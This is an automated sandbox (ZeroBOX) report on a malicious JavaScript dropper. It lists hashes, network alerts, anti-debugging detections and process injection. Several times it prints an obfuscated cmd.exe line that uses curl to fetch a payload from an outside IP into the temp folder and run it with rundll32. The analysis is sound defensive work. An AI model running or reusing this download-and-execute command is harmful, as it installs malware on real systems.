Summary | ZeroBOX

opt-71.js

AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 17, 2023, 10:35 a.m. Oct. 17, 2023, 10:37 a.m.
Size 413.4KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 a5de8594f885a3ba4d8fdad1c9122c33
SHA256 b8cf2d47dc1b5932f414ef3e66ca1890c0bd9371b4aaa5034c4210dfaba92e19
CRC32 AD426A35
ssdeep 6144:yj38P9IwPaHP79bvi5u9r9pMrSwx+0KTxfdchsTHMZOdxEDFAdeCG:YclKTfjoOdxECdep
Yara None matched

Name Response Post-Analysis Lookup
www.ssl.com 54.236.82.84
IP Address Status Action
164.124.101.2 Active Moloch
54.174.96.153 Active Moloch
89.147.111.46 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49167 -> 89.147.111.46:80 2013028 ET POLICY curl User-Agent Outbound Attempted Information Leak
TCP 192.168.56.101:49167 -> 89.147.111.46:80 2034567 ET HUNTING curl User-Agent to Dotted Quad Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 'ttk' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: ttk
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping request could not find host ttk. Please check the name and try again.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping request could not find host ttk. Please check the name and try again.
console_handle: 0x00000007
1 1 0
suspicious_features Connection to IP address suspicious_request GET http://89.147.111.46/gWUA/Enven
request GET http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt
request GET http://89.147.111.46/gWUA/Enven
cmdline cmd.exe /c ttk || ecHO ttk & piNg ttk || CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk || rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs
cmdline "C:\Windows\System32\cmd.exe" /c ttk || ecHO ttk & piNg ttk || CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk || rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ttk || ecHO ttk & piNg ttk || CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk || rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline piNg -n 2 ttk
cmdline cmd.exe /c ttk || ecHO ttk & piNg ttk || CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk || rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs
cmdline "C:\Windows\System32\cmd.exe" /c ttk || ecHO ttk & piNg ttk || CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk || rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs
cmdline piNg ttk
host 89.147.111.46
Time & API Arguments Status Return Repeated

WSASend

buffer: GET /repository/SSLcomRootCertificationAuthorityRSA.crt HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: www.ssl.com
socket: 960
0 0
Time & API Arguments Status Return Repeated

WSASend

buffer: GET /repository/SSLcomRootCertificationAuthorityRSA.crt HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: www.ssl.com
socket: 960
0 0
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ttk || ecHO ttk & piNg ttk || CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk || rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs
parent_process wscript.exe martian_process cmd.exe /c ttk || ecHO ttk & piNg ttk || CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk || rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs
Process injection Process 2552 resumed a thread in remote process 2700
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000004e8
suspend_count: 1
process_identifier: 2700
1 0 0
file C:\Windows\System32\cmd.exe